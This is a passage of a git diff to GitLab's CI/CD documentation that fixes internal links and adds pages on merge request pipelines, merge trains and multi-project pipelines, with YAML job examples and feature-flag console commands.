Configuration Reference](../yaml/index.md). You can also configure specific aspects of your pipelines through the GitLab UI. For example: - [Pipeline settings](settings.md) for each project. - [Pipeline schedules](schedules.md). -- [Custom CI/CD variables](../variables/README.md#custom-cicd-variables). +- [Custom CI/CD variables](../variables/index.md#custom-cicd-variables). ### Ref Specs for Runners @@ -89,13 +89,13 @@ This table lists the refspecs injected for each pipeline type: |--------------- |---------------------------------------- | | Pipeline for Branches | `+<sha>:refs/pipelines/<id>` and `+refs/heads/<name>:refs/remotes/origin/<name>` | | pipeline for Tags | `+<sha>:refs/pipelines/<id>` and `+refs/tags/<name>:refs/tags/<name>` | -| [Pipeline for Merge Requests](../merge_request_pipelines/index.md) | `+<sha>:refs/pipelines/<id>` | +| [Pipeline for Merge Requests](../pipelines/merge_request_pipelines.md) | `+<sha>:refs/pipelines/<id>` | The refs `refs/heads/<name>` and `refs/tags/<name>` exist in your project repository. GitLab generates the special ref `refs/pipelines/<id>` during a running pipeline job. This ref can be created even after the associated branch or tag has been deleted. It's therefore useful in some features such as [automatically stopping an environment](../environments/index.md#stopping-an-environment), -and [merge trains](../merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md) +and [merge trains](../pipelines/merge_trains.md) that might run pipelines after branch deletion. ### View pipelines @@ -125,7 +125,7 @@ you can filter the pipeline list by: ### Run a pipeline manually -Pipelines can be manually executed, with predefined or manually-specified [variables](../variables/README.md). +Pipelines can be manually executed, with predefined or manually-specified [variables](../variables/index.md). You might do this if the results of a pipeline (for example, a code build) are required outside the normal operation of the pipeline. @@ -136,7 +136,7 @@ To execute a pipeline manually: 1. Select the **Run pipeline** button. 1. On the **Run pipeline** page: 1. Select the branch or tag to run the pipeline for in the **Run for branch name or tag** field. - 1. Enter any [environment variables](../variables/README.md) required for the pipeline run. + 1. Enter any [environment variables](../variables/index.md) required for the pipeline run. You can set specific variables to have their [values prefilled in the form](#prefill-variables-in-manual-pipelines). 1. Click the **Run pipeline** button. @@ -146,9 +146,9 @@ The pipeline now executes the jobs as configured. > [Introduced in](https://gitlab.com/gitlab-org/gitlab/-/issues/30101) GitLab 13.7. -You can use the [`value` and `description`](../yaml/README.md#prefill-variables-in-manual-pipelines) +You can use the [`value` and `description`](../yaml/index.md#prefill-variables-in-manual-pipelines) keywords to define -[pipeline-level (global) variables](../variables/README.md#create-a-custom-cicd-variable-in-the-gitlab-ciyml-file) +[pipeline-level (global) variables](../variables/index.md#create-a-custom-cicd-variable-in-the-gitlab-ciyml-file) that are prefilled when running a pipeline manually. In pipelines triggered manually, the **Run pipelines** page displays all top-level variables @@ -200,7 +200,7 @@ For each `var` or `file_var`, a key and value are required. ### Add manual interaction to your pipeline -Manual actions, configured using the [`when:manual`](../yaml/README.md#whenmanual) keyword, +Manual actions, configured using the [`when:manual`](../yaml/index.md#whenmanual) keyword, allow you to require manual interaction before moving forward in the pipeline. You can do this straight from the pipeline graph. Just click the play button @@ -222,7 +222,7 @@ to an updated status. This functionality is only available: -- For users with at least Developer access. +- For users with at least the Developer role. - If the stage contains [manual actions](#add-manual-interaction-to-your-pipeline). ### Delete a pipeline @@ -301,7 +301,7 @@ A strict security model is enforced when pipelines are executed on [protected branches](../../user/project/protected_branches.md). The following actions are allowed on protected branches only if the user is -[allowed to merge or push](../../user/project/protected_branches.md#using-the-allowed-to-merge-and-allowed-to-push-settings) +[allowed to merge or push](../../user/project/protected_branches.md) on that specific branch: - Run manual pipelines (using the [Web UI](#run-a-pipeline-manually) or [pipelines API](#pipelines-api)). @@ -347,9 +347,9 @@ You can group the jobs by:  - [Job dependencies](#view-job-dependencies-in-the-pipeline-graph), which arranges - jobs based on their [`needs`](../yaml/README.md#needs) dependencies. + jobs based on their [`needs`](../yaml/index.md#needs) dependencies. -[Multi-project pipeline graphs](../multi_project_pipelines.md#multi-project-pipeline-visualization) help +[Multi-project pipeline graphs](multi_project_pipelines.md#multi-project-pipeline-visualization) help you visualize the entire pipeline, including all cross-project inter-dependencies. **(PREMIUM)** ### View job dependencies in the pipeline graph @@ -365,7 +365,7 @@ This in-development feature might not be available for your use. There can be [risks when enabling features still in development](../../user/feature_flags.md#risks-when-enabling-features-still-in-development). Refer to this feature's version history for more details. -You can arrange jobs in the pipeline graph based on their [`needs`](../yaml/README.md#needs) +You can arrange jobs in the pipeline graph based on their [`needs`](../yaml/index.md#needs) dependencies. Jobs in the leftmost column run first, and jobs that depend on them are grouped in the next columns. @@ -441,5 +441,5 @@ GitLab provides API endpoints to: - Perform basic functions. For more information, see [Pipelines API](../../api/pipelines.md). - Maintain pipeline schedules. For more information, see [Pipeline schedules API](../../api/pipeline_schedules.md). - Trigger pipeline runs. For more information, see: - - [Triggering pipelines through the API](../triggers/README.md). + - [Triggering pipelines through the API](../triggers/index.md). - [Pipeline triggers API](../../api/pipeline_triggers.md). diff --git a/doc/ci/pipelines/job_artifacts.md b/doc/ci/pipelines/job_artifacts.md index 0bb7007e7a9..b9a42c76293 100644 --- a/doc/ci/pipelines/job_artifacts.md +++ b/doc/ci/pipelines/job_artifacts.md @@ -48,7 +48,7 @@ is used. If you run two types of pipelines (like branch and scheduled) for the same ref, the pipeline that finishes later creates the job artifact. -For more examples, view the [keyword reference for the `.gitlab-ci.yml` file](../yaml/README.md#artifacts). +For more examples, view the [keyword reference for the `.gitlab-ci.yml` file](../yaml/index.md#artifacts). ## Download job artifacts @@ -112,7 +112,7 @@ the artifact. ## How searching for job artifacts works In [GitLab 13.5](https://gitlab.com/gitlab-org/gitlab/-/issues/201784) and later, artifacts -for [parent and child pipelines](../parent_child_pipelines.md) are searched in hierarchical +for [parent and child pipelines](parent_child_pipelines.md) are searched in hierarchical order from parent to child. For example, if both parent and child pipelines have a job with the same name, the job artifact from the parent pipeline is returned. @@ -173,7 +173,7 @@ https://gitlab.com/gitlab-org/gitlab/-/jobs/artifacts/main/file/htmlcov/index.ht ## When job artifacts are deleted -See the [`expire_in`](../yaml/README.md#artifactsexpire_in) documentation for information on when +See the [`expire_in`](../yaml/index.md#artifactsexpire_in) documentation for information on when job artifacts are deleted. ### Keep artifacts from most recent successful jobs @@ -203,5 +203,5 @@ This message is often preceded by other errors or warnings that specify the file generated. Check the job log for these messages. If you find no helpful messages, retry the failed job after activating -[CI/CD debug logging](../variables/README.md#debug-logging). +[CI/CD debug logging](../variables/index.md#debug-logging). This logging should provide information to help you investigate further. diff --git a/doc/ci/pipelines/merge_request_pipelines.md b/doc/ci/pipelines/merge_request_pipelines.md new file mode 100644 index 00000000000..29c12551f12 --- /dev/null +++ b/doc/ci/pipelines/merge_request_pipelines.md @@ -0,0 +1,215 @@ +--- +stage: Verify +group: Pipeline Execution +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +type: reference, index +last_update: 2019-07-03 +--- + +# Pipelines for merge requests **(FREE)** + +> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/15310) in GitLab 11.6. + +In a [basic configuration](pipeline_architectures.md#basic-pipelines), GitLab runs a pipeline each time +changes are pushed to a branch. + +If you want the pipeline to run jobs **only** on commits associated with a merge request, +you can use *pipelines for merge requests*. + +In the UI, these pipelines are labeled as `detached`. Otherwise, these pipelines are the same +as other pipelines. + +Pipelines for merge requests can run when you: + +- Create a new merge request. +- Commit changes to the source branch for the merge request. +- Select the **Run pipeline** button from the **Pipelines** tab in the merge request. + +If you use this feature with [merge when pipeline succeeds](../../user/project/merge_requests/merge_when_pipeline_succeeds.md), +pipelines for merge requests take precedence over other pipelines. + +## Prerequisites + +To enable pipelines for merge requests: + +- Your repository must be a GitLab repository, not an + [external repository](../ci_cd_for_external_repos/index.md). +- You must have the Developer [role](../../user/permissions.md) + to run a pipeline for merge requests. + +## Configure pipelines for merge requests + +To configure pipelines for merge requests, you must configure your [CI/CD configuration file](../yaml/index.md). +To do this, you can use [`rules`](#use-rules-to-run-pipelines-for-merge-requests) or [`only/except`](#use-only-or-except-to-run-pipelines-for-merge-requests). + +### Use `rules` to run pipelines for merge requests + +GitLab recommends that you use the `rules` keyword, which is available in +[`workflow:rules` templates](../yaml/index.md#workflowrules-templates). + +### Use `only` or `except` to run pipelines for merge requests + +You can use the `only/except` keywords. However, with this method, you must specify `only: - merge_requests` for each job. + +In the following example, the pipeline contains a `test` job that is configured to run on merge requests. +The `build` and `deploy` jobs don't have the `only: - merge_requests` keyword, +so they don't run on merge requests. + +```yaml +build: + stage: build + script: ./build + only: + - main + +test: + stage: test + script: ./test + only: + - merge_requests + +deploy: + stage: deploy + script: ./deploy + only: + - main +``` + +#### Exclude specific jobs + +When you use `only: [merge_requests]`, only jobs with +that keyword are run in the context of a merge request. No other jobs run. + +However, you can invert this behavior and have all of your jobs run except +for one or two. For example, you might have a pipeline with jobs `A`, `B`, and `C`, and you want: + +- All pipelines to always run `A` and `B`. +- `C` to run only for merge requests. + +To achieve this outcome, configure your `.gitlab-ci.yml` file as follows: + +```yaml +.only-default: &only-default + only: + - main + - merge_requests + - tags + +A: + <<: *only-default + script: + - ... + +B: + <<: *only-default + script: + - ... + +C: + script: + - ... + only: + - merge_requests +``` + +- `A` and `B` always run, because they get the `only:` rule to execute in all cases. +- `C` only runs for merge requests. It doesn't run for any pipeline + except a merge request pipeline. + +In this example, you don't have to add the `only:` rule to all of your jobs to make +them always run. You can use this format to set up a Review App, which helps to +save resources. + +#### Exclude specific branches + +Branch refs use this format: `refs/heads/my-feature-branch`. +Merge request refs use this format: `refs/merge-requests/:iid/head`. + +Because of this difference, the following configuration does not work as expected: + +```yaml +# Does not exclude a branch named "docs-my-fix"! +test: + only: [merge_requests] + except: [/^docs-/] +``` + +Instead, use the +[`$CI_COMMIT_REF_NAME` predefined environment +variable](../variables/predefined_variables.md) in +combination with +[`only:variables`](../yaml/index.md#onlyvariables--exceptvariables) to +accomplish this behavior: + +```yaml +test: + only: [merge_requests] + except: + variables: + - $CI_COMMIT_REF_NAME =~ /^docs-/ +``` + +## Run pipelines in the parent project for merge requests from a forked project **(PREMIUM)** + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/217451) in GitLab 13.3. +> - [Moved](https://about.gitlab.com/blog/2021/01/26/new-gitlab-product-subscription-model/) to GitLab Premium in 13.9. + +By default, external contributors who work in forks can't create pipelines in the +parent project. When a merge request that comes from a fork triggers a pipeline: + +- The pipeline is created and runs in the fork (source) project, not the parent (target) project. +- The pipeline uses the fork project's CI/CD configuration and resources. + +If a pipeline runs in a fork, a **fork** badge appears for the pipeline in the merge request. + + + +Sometimes parent project members want the pipeline to run in the parent +project. They may want to ensure that the post-merge pipeline passes in the parent project. +For example, a fork project could try to use a corrupted runner that doesn't execute +test scripts properly, but reports a passed pipeline. Reviewers in the parent project +could mistakenly trust the merge request because it passed a faked pipeline. + +Parent project members with at least the [Developer role](../../user/permissions.md) +can create pipelines in the parent project for merge requests +from a forked project. In the merge request, go to the **Pipelines** tab and select +**Run pipeline**. + +WARNING: +Fork merge requests can contain malicious code that tries to steal secrets in the +parent project when the pipeline runs, even before merge. As a reviewer, you must carefully +check the changes in the merge request before triggering the pipeline. GitLab shows +a warning that you must accept before you can trigger the pipeline. + +## Predefined variables available for pipelines for merge requests + +When you use pipelines for merge requests, [additional predefined variables](../variables/predefined_variables.md#predefined-variables-for-merge-request-pipelines) are available to the CI/CD jobs. +These variables contain information from the associated merge request, so that you can +integrate your job with the [GitLab Merge Request API](../../api/merge_requests.md). + +## Troubleshooting + +### Two pipelines created when pushing to a merge request + +If you are experiencing duplicated pipelines when using `rules`, take a look at +the [important differences between `rules` and `only`/`except`](../jobs/job_control.md#avoid-duplicate-pipelines), +which helps you get your starting configuration correct. + +If you are seeing two pipelines when using `only/except`, please see the caveats +related to using `only/except` above (or, consider moving to `rules`). + +In [GitLab 13.7](https://gitlab.com/gitlab-org/gitlab/-/issues/201845) and later, +you can add `workflow:rules` to [switch from branch pipelines to merge request pipelines](../yaml/index.md#switch-between-branch-pipelines-and-merge-request-pipelines). +After a merge request is open on the branch, the pipeline switches to a merge request pipeline. + +### Two pipelines created when pushing an invalid CI configuration file + +Pushing to a branch with an invalid CI configuration file can trigger +the creation of two types of failed pipelines. One pipeline is a failed merge request +pipeline, and the other is a failed branch pipeline, but both are caused by the same +invalid configuration. + +## Related topics + +- [Pipelines for merged results](pipelines_for_merged_results.md). +- [Merge trains](merge_trains.md). diff --git a/doc/ci/pipelines/merge_trains.md b/doc/ci/pipelines/merge_trains.md new file mode 100644 index 00000000000..3e6ad071d7e --- /dev/null +++ b/doc/ci/pipelines/merge_trains.md @@ -0,0 +1,236 @@ +--- +stage: Verify +group: Pipeline Execution +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +type: reference +last_update: 2019-07-03 +--- + +# Merge Trains **(PREMIUM)** + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/9186) in [GitLab Premium](https://about.gitlab.com/pricing/) 12.0. +> - [Squash and merge](../../user/project/merge_requests/squash_and_merge.md) support [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/13001) in [GitLab Premium](https://about.gitlab.com/pricing/) 12.6. + +For more information about why you might want to use Merge Trains, read [How merge trains keep your master green](https://about.gitlab.com/blog/2020/01/30/all-aboard-merge-trains/). + +When [pipelines for merged results](pipelines_for_merged_results.md) are +enabled, the pipeline jobs run as if the changes from your source branch have already +been merged into the target branch. + +However, the target branch may be changing rapidly. When you're ready to merge, +if you haven't run the pipeline in a while, the target branch may have already changed. +Merging now could introduce breaking changes. + +*Merge trains* can prevent this from happening. A merge train is a queued list of merge +requests, each waiting to be merged into the target branch. + +Many merge requests can be added to the train. Each merge request runs its own merged results pipeline, +which includes the changes from all of the other merge requests in *front* of it on the train. +All the pipelines run in parallel, to save time. + +If the pipeline for a merge request fails, the breaking changes are not merged, and the target +branch is unaffected. The merge request is removed from the train, and all pipelines behind it restart. + +If the pipeline for the merge request at the front of the train completes successfully, +the changes are merged into the target branch, and the other pipelines continue to +run. + +To add a merge request to a merge train, you need [permissions](../../user/permissions.md) to push to the target branch. + +Each merge train can run a maximum of **twenty** pipelines in parallel. +If more than twenty merge requests are added to the merge train, the merge requests +are queued until a slot in the merge train is free. There is no limit to the +number of merge requests that can be queued. + +## Merge train example + +Three merge requests (`A`, `B` and `C`) are added to a merge train in order, which +creates three merged results pipelines that run in parallel: + +1. The first pipeline runs on the changes from `A` combined with the target branch. +1. The second pipeline runs on the changes from `A` and `B` combined with the target branch. +1. The third pipeline runs on the changes from `A`, `B`, and `C` combined with the target branch. + +If the pipeline for `B` fails, it is removed from the train. The pipeline for +`C` restarts with the `A` and `C` changes, but without the `B` changes. + +If `A` then completes successfully, it merges into the target branch, and `C` continues +to run. If more merge requests are added to the train, they now include the `A` +changes that are included in the target branch, and the `C` changes that are from +the merge request already in the train. + +Read more about [how merge trains keep your master green](https://about.gitlab.com/blog/2020/01/30/all-aboard-merge-trains/). + +<i class="fa fa-youtube-play youtube" aria-hidden="true"></i> +Watch this video for a demonstration on [how parallel execution +of Merge Trains can prevent commits from breaking the default +branch](https://www.youtube.com/watch?v=D4qCqXgZkHQ). + +## Prerequisites + +To enable merge trains: + +- You must have the [Maintainer role](../../user/permissions.md). +- You must be using [GitLab Runner](https://gitlab.com/gitlab-org/gitlab-runner) 11.9 or later. +- In GitLab 13.0 and later, you need [Redis](https://redis.io/) 5.0 or later. +- Your repository must be a GitLab repository, not an + [external repository](../ci_cd_for_external_repos/index.md). + +## Enable merge trains + +To enable merge trains for your project: + +1. If you are on a self-managed GitLab instance, ensure the [feature flag](#merge-trains-feature-flag) is set correctly. +1. [Configure your CI/CD configuration file](merge_request_pipelines.md#configure-pipelines-for-merge-requests) + so that the pipeline or individual jobs run for merge requests. +1. Visit your project's **Settings > General** and expand **Merge requests**. +1. In the **Merge method** section, verify that **Merge commit** is selected. + You cannot use **Merge commit with semi-linear history** or **Fast-forward merge** with merge trains. +1. In the **Merge options** section, select **Enable merged results pipelines.** (if not already selected) and **Enable merge trains.** +1. Click **Save changes** + +In GitLab 13.5 and earlier, there is only one checkbox, named +**Enable merge trains and pipelines for merged results**. + +WARNING: +If you select the check box but don't configure your CI/CD to use +pipelines for merge requests, your merge requests may become stuck in an +unresolved state or your pipelines may be dropped. + +## Start a merge train + +To start a merge train: + +1. Visit a merge request. +1. Click the **Start merge train** button. + + + +Other merge requests can now be added to the train. + +## Add a merge request to a merge train + +To add a merge request to a merge train: + +1. Visit a merge request. +1. Click the **Add to merge train** button. + +If pipelines are already running for the merge request, you cannot add the merge request +to the train. Instead, you can schedule to add the merge request to a merge train **when the latest +pipeline succeeds**. + + + +## Remove a merge request from a merge train + +1. Visit a merge request. +1. Click the **Remove from merge train** button. + + + +If you want to add the merge request to a merge train again later, you can. + +## View a merge request's current position on the merge train + +After a merge request has been added to the merge train, the merge request's +current position is displayed under the pipeline widget: + + + +## Immediately merge a merge request with a merge train + +If you have a high-priority merge request (for example, a critical patch) that must +be merged urgently, you can bypass the merge train by using the **Merge Immediately** option. +This is the fastest option to get the change merged into the target branch. + + + +WARNING: +Each time you merge a merge request immediately, the current merge train +is recreated and all pipelines restart. + +## Troubleshooting + +### Merge request dropped from the merge train immediately + +If a merge request is not mergeable (for example, it's a draft merge request, there is a merge +conflict, etc.), your merge request is dropped from the merge train automatically. + +In these cases, the reason for dropping the merge request is in the **system notes**. + +To check the reason: + +1. Open the merge request that was dropped from the merge train. +1. Open the **Discussion** tab. +1. Find a system note that includes either: + - The text **... removed this merge request from the merge train because ...** + - **... aborted this merge request from the merge train because ...** + The reason is given in the text after the **because ...** phrase. + + + +### Merge When Pipeline Succeeds cannot be chosen + +[Merge When Pipeline Succeeds](../../user/project/merge_requests/merge_when_pipeline_succeeds.md) +is currently unavailable when Merge Trains are enabled. + +See [the related issue](https://gitlab.com/gitlab-org/gitlab/-/issues/12267) +for more information. + +### Merge Train Pipeline cannot be retried + +When a pipeline for merge trains fails the merge request is dropped from the train and the pipeline can't be retried. +Pipelines for merge trains run on the merged result of the changes in the merge request and +the changes from other merge requests already on the train. If the merge request is dropped from the train, +the merged result is out of date and the pipeline can't be retried. + +Instead, you should [add the merge request to the train](#add-a-merge-request-to-a-merge-train) +again, which triggers a new pipeline. + +### Unable to add to merge train with message "The pipeline for this merge request failed." + +Sometimes the **Start/Add to Merge Train** button is not available and the merge request says, +"The pipeline for this merge request failed. Please retry the job or push a new commit to fix the failure." + +This issue occurs when [**Pipelines must succeed**](../../user/project/merge_requests/merge_when_pipeline_succeeds.md#only-allow-merge-requests-to-be-merged-if-the-pipeline-succeeds) +is enabled in **Settings > General > Merge requests**. This option requires that you +run a new successful pipeline before you can re-add a merge request to a merge train. + +Merge trains ensure that each pipeline has succeeded before a merge happens, so +you can clear the **Pipelines must succeed** check box and keep +**Enable merge trains and pipelines for merged results** (merge trains) enabled. + +If you want to keep the **Pipelines must succeed** option enabled along with Merge +Trains, create a new pipeline for merged results when this error occurs: + +1. Go to the **Pipelines** tab and click **Run pipeline**. +1. Click **Start/Add to merge train when pipeline succeeds**. + +See [the related issue](https://gitlab.com/gitlab-org/gitlab/-/issues/35135) +for more information. + +### Merge Trains feature flag **(PREMIUM SELF)** + +In [GitLab 13.6 and later](https://gitlab.com/gitlab-org/gitlab/-/issues/244831), +you can [enable or disable merge trains in the project settings](#enable-merge-trains). + +In GitLab 13.5 and earlier, merge trains are automatically enabled when +[pipelines for merged results](pipelines_for_merged_results.md) are enabled. +To use pipelines for merged results without using merge trains, you can enable a +[feature flag](../../user/feature_flags.md) that blocks the merge trains feature. + +[GitLab administrators with access to the GitLab Rails console](../../administration/feature_flags.md) +can enable the feature flag to disable merge trains: + +```ruby +Feature.enable(:disable_merge_trains) +``` + +After you enable this feature flag, all existing merge trains are cancelled and +the **Start/Add to Merge Train** button no longer appears in merge requests. + +To disable the feature flag, and enable merge trains again: + +```ruby +Feature.disable(:disable_merge_trains) +``` diff --git a/doc/ci/pipelines/multi_project_pipelines.md b/doc/ci/pipelines/multi_project_pipelines.md new file mode 100644 index 00000000000..e3fe0fd20f5 --- /dev/null +++ b/doc/ci/pipelines/multi_project_pipelines.md @@ -0,0 +1,329 @@ +--- +stage: Verify +group: Pipeline Authoring +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +type: reference +--- + +# Multi-project pipelines **(FREE)** + +> [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/199224) to GitLab Free in 12.8. + +You can set up [GitLab CI/CD](../index.md) across multiple projects, so that a pipeline +in one project can trigger a pipeline in another project. You can visualize the entire pipeline +in one place, including all cross-project interdependencies. + +For example, you might deploy your web application from three different projects in GitLab. +Each project has its own build, test, and deploy process. With multi-project pipelines you can +visualize the entire pipeline, including all build and test stages for all three projects. + +<i class="fa fa-youtube-play youtube" aria-hidden="true"></i> +For an overview, see the [Multi-project pipelines demo](https://www.youtube.com/watch?v=g_PIwBM1J84). + +Multi-project pipelines are also useful for larger products that require cross-project interdependencies, like those +with a [microservices architecture](https://about.gitlab.com/blog/2016/08/16/trends-in-version-control-land-microservices/). +Learn more in the [Cross-project Pipeline Triggering and Visualization demo](https://about.gitlab.com/learn/) +at GitLab@learn, in the Continuous Integration section. + +If you trigger a pipeline in a downstream private project, on the upstream project's pipelines page, +you can view: + +- The name of the project. +- The status of the pipeline. + +If you have a public project that can trigger downstream pipelines in a private project, +make sure there are no confidentiality problems. + +## Create multi-project pipelines + +To create multi-project pipelines, you can: + +- [Define them in your `.gitlab-ci.yml` file](#define-multi-project-pipelines-in-your-gitlab-ciyml-file). +- [Use the API](#create-multi-project-pipelines-by-using-the-api). + +### Define multi-project pipelines in your `.gitlab-ci.yml` file + +> [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/199224) to GitLab Free in 12.8. + +When you create a multi-project pipeline in your `.gitlab-ci.yml` file, +you create what is called a *trigger job*. For example: + +```yaml +rspec: + stage: test + script: bundle exec rspec + +staging: + variables: + ENVIRONMENT: staging + stage: deploy + trigger: my/deployment +``` + +In this example, after the `rspec` job succeeds in the `test` stage, +the `staging` trigger job starts. The initial status of this +job is `pending`. + +GitLab then creates a downstream pipeline in the +`my/deployment` project and, as soon as the pipeline is created, the +`staging` job succeeds. The full path to the project is `my/deployment`. + +You can view the status for the pipeline, or you can display +[the downstream pipeline's status instead](#mirror-status-of-a-triggered-pipeline-in-the-trigger-job). + +The user that creates the upstream pipeline must be able to create pipelines in the +downstream project (`my/deployment`) too. If the downstream project is not found, +or the user does not have [permission](../../user/permissions.md) to create a pipeline there, +the `staging` job is marked as _failed_. + +#### Trigger job configuration keywords + +Trigger jobs can use only a limited set of the GitLab CI/CD [configuration keywords](../yaml/index.md). +The keywords available for use in trigger jobs are: + +- [`trigger`](../yaml/index.md#trigger) +- [`stage`](../yaml/index.md#stage) +- [`allow_failure`](../yaml/index.md#allow_failure) +- [`rules`](../yaml/index.md#rules) +- [`only` and `except`](../yaml/index.md#only--except) +- [`when`](../yaml/index.md#when) (only with a value of `on_success`, `on_failure`, or `always`) +- [`extends`](../yaml/index.md#extends) +- [`needs`](../yaml/index.md#needs) + +#### Specify a downstream pipeline branch + +You can specify a branch name for the downstream pipeline to use. +GitLab uses the commit on the head of the branch to +create the downstream pipeline. + +```yaml +rspec: + stage: test + script: bundle exec rspec + +staging: + stage: deploy + trigger: + project: my/deployment + branch: stable-11-2 +``` + +Use: + +- The `project` keyword to specify the full path to a downstream project. +- The `branch` keyword to specify the name of a branch in the project specified by `project`. + [In GitLab 12.4](https://gitlab.com/gitlab-org/gitlab/-/issues/10126) and later, variable expansion is + supported. + +Pipelines triggered on a protected branch in a downstream project use the [role](../../user/permissions.md) +of the user that ran the trigger job in the upstream project. If the user does not +have permission to run CI/CD pipelines against the protected branch, the pipeline fails. See +[pipeline security for protected branches](index.md#pipeline-security-on-protected-branches). + +#### Pass CI/CD variables to a downstream pipeline by using the `variables` keyword + +Sometimes you might want to pass CI/CD variables to a downstream pipeline. +You can do that by using the `variables` keyword, just like you would for any other job. + +```yaml +rspec: + stage: test + script: bundle exec rspec + +staging: + variables: + ENVIRONMENT: staging + stage: deploy + trigger: my/deployment +``` + +The `ENVIRONMENT` variable is passed to every job defined in a downstream +pipeline. It is available as a variable when GitLab Runner picks a job. + +In the following configuration, the `MY_VARIABLE` variable is passed to the downstream pipeline +that is created when the `trigger-downstream` job is queued. This is because `trigger-downstream` +job inherits variables declared in global variables blocks, and then we pass these variables to a downstream pipeline. + +```yaml +variables: + MY_VARIABLE: my-value + +trigger-downstream: + variables: + ENVIRONMENT: something + trigger: my/project +``` + +You can stop global variables from reaching the downstream pipeline by using the [`inherit` keyword](../yaml/index.md#inherit). +In this example, the `MY_GLOBAL_VAR` variable is not available in the triggered pipeline: + +```yaml +variables: + MY_GLOBAL_VAR: value + +trigger-downstream: + inherit: + variables: false + variables: + MY_LOCAL_VAR: value + trigger: my/project +``` + +You might want to pass some information about the upstream pipeline using, for +example, predefined variables. In order to do that, you can use interpolation +to pass any variable. For example: + +```yaml +downstream-job: + variables: + UPSTREAM_BRANCH: $CI_COMMIT_REF_NAME + trigger: my/project +``` + +In this scenario, the `UPSTREAM_BRANCH` variable with a value related to the +upstream pipeline is passed to the `downstream-job` job. It is available +in the context of all downstream builds. + +Upstream pipelines take precedence over downstream ones. If there are two +variables with the same name defined in both upstream and downstream projects, +the ones defined in the upstream project take precedence. + +#### Pass CI/CD variables to a downstream pipeline by using variable inheritance + +You can pass variables to a downstream pipeline with [`dotenv` variable inheritance](../variables/index.md#pass-an-environment-variable-to-another-job) and [cross project artifact downloads](../yaml/index.md#cross-project-artifact-downloads-with-needs). + +In the upstream pipeline: + +1. Save the variables in a `.env` file. +1. Save the `.env` file as a `dotenv` report. +1. Trigger the downstream pipeline. + + ```yaml + build_vars: + stage: build + script: + - echo "BUILD_VERSION=hello" >> build.env + artifacts: + reports: + dotenv: build.env + + deploy: + stage: deploy + trigger: my/downstream_project + ``` + +1. Set the `test` job in the downstream pipeline to inherit the variables from the `build_vars` + job in the upstream project with `needs:`. The `test` job inherits the variables in the + `dotenv` report and it can access `BUILD_VERSION` in the script: + + ```yaml + test: + stage: test + script: + - echo $BUILD_VERSION + needs: + - project: my/upstream_project + job: build_vars + ref: master + artifacts: true + ``` + +#### Use `rules` or `only`/`except` with multi-project pipelines + +You can use CI/CD variables or the [`rules`](../yaml/index.md#rulesif) keyword to +[control job behavior](../jobs/job_control.md) for multi-project pipelines. When a +downstream pipeline is triggered with the [`trigger`](../yaml/index.md#trigger) keyword, +the value of the [`$CI_PIPELINE_SOURCE` predefined variable](../variables/predefined_variables.md) +is `pipeline` for all its jobs. + +If you use [`only/except`](../yaml/index.md#only--except) to control job behavior, use the +[`pipelines`](../yaml/index.md#onlyrefs--exceptrefs) keyword. + +#### Mirror status of a triggered pipeline in the trigger job + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/11238) in GitLab Premium 12.3. +> - [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/199224) to GitLab Free in 12.8. + +You can mirror the pipeline status from the triggered pipeline to the source +trigger job by using `strategy: depend`. For example: + +```yaml +trigger_job: + trigger: + project: my/project + strategy: depend +``` + +#### Mirror status from upstream pipeline + +You can mirror the pipeline status from an upstream pipeline to a bridge job by +using the `needs:pipeline` keyword. The latest pipeline status from the default branch is +replicated to the bridge job. + +For example: + +```yaml +upstream_bridge: + stage: test + needs: + pipeline: other/project +``` + +### Create multi-project pipelines by using the API + +> [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/31573) to GitLab Free in 12.4. + +When you use the [`CI_JOB_TOKEN` to trigger pipelines](../triggers/index.md#ci-job-token), +GitLab recognizes the source of the job token. The pipelines become related, +so you can visualize their relationships on pipeline graphs. + +These relationships are displayed in the pipeline graph by showing inbound and +outbound connections for upstream and downstream pipeline dependencies. + +When using: + +- CI/CD variables or [`rules`](../yaml/index.md#rulesif) to control job behavior, the value of + the [`$CI_PIPELINE_SOURCE` predefined variable](../variables/predefined_variables.md) is + `pipeline` for multi-project pipeline triggered through the API with `CI_JOB_TOKEN`. +- [`only/except`](../yaml/index.md#only--except) to control job behavior, use the + `pipelines` keyword. + +## Trigger a pipeline when an upstream project is rebuilt **(PREMIUM)** + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/9045) in GitLab Premium 12.8. + +You can trigger a pipeline in your project whenever a pipeline finishes for a new +tag in a different project. + +Prerequisites: + +- The upstream project must be [public](../../public_access/public_access.md). +- The user must have the [Developer role](../../user/permissions.md#project-members-permissions) + in the upstream project. + +To trigger the pipeline when the upstream project is rebuilt: + +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left sidebar, select **Settings > CI/CD** page. +1. Expand the **Pipeline subscriptions** section. +1. Enter the project you want to subscribe to, in the format `<namespace>/<project>`. + For example, if the project is `https://gitlab.com/gitlab-org/gitlab`, use `gitlab-org/gitlab`. +1. Select **Subscribe**. + +Any pipelines that complete successfully for new tags in the subscribed project +now trigger a pipeline on the current project's default branch. The maximum +number of upstream pipeline subscriptions is 2 by default, for both the upstream and +downstream projects. On self-managed instances, an administrator can change this +[limit](../../administration/instance_limits.md#number-of-cicd-subscriptions-to-a-project). + +## Multi-project pipeline visualization **(PREMIUM)** + +When you configure GitLab CI/CD for your project, you can visualize the stages of your +[jobs](index.md#configure-a-pipeline) on a [pipeline graph](index.md#visualize-pipelines). + + + +In the merge request, on the **Pipelines** tab, multi-project pipeline mini-graphs are displayed. +They expand and are shown adjacent to each other when hovering (or tapping on touchscreen devices). + + diff --git a/doc/ci/pipelines/parent_child_pipelines.md 